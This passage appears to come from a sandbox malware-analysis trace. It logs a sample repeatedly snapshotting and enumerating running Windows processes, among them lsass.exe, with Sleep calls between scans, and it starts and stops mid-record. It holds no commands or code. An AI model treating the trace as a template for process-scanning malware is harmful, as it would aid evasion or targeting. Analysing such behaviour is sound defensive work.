th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.246] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.247] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.294] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.295] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0105.325] CloseHandle (hObject=0xbc) returned 1 [0105.325] Sleep (dwMilliseconds=0x12c) [0105.668] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.673] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.691] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 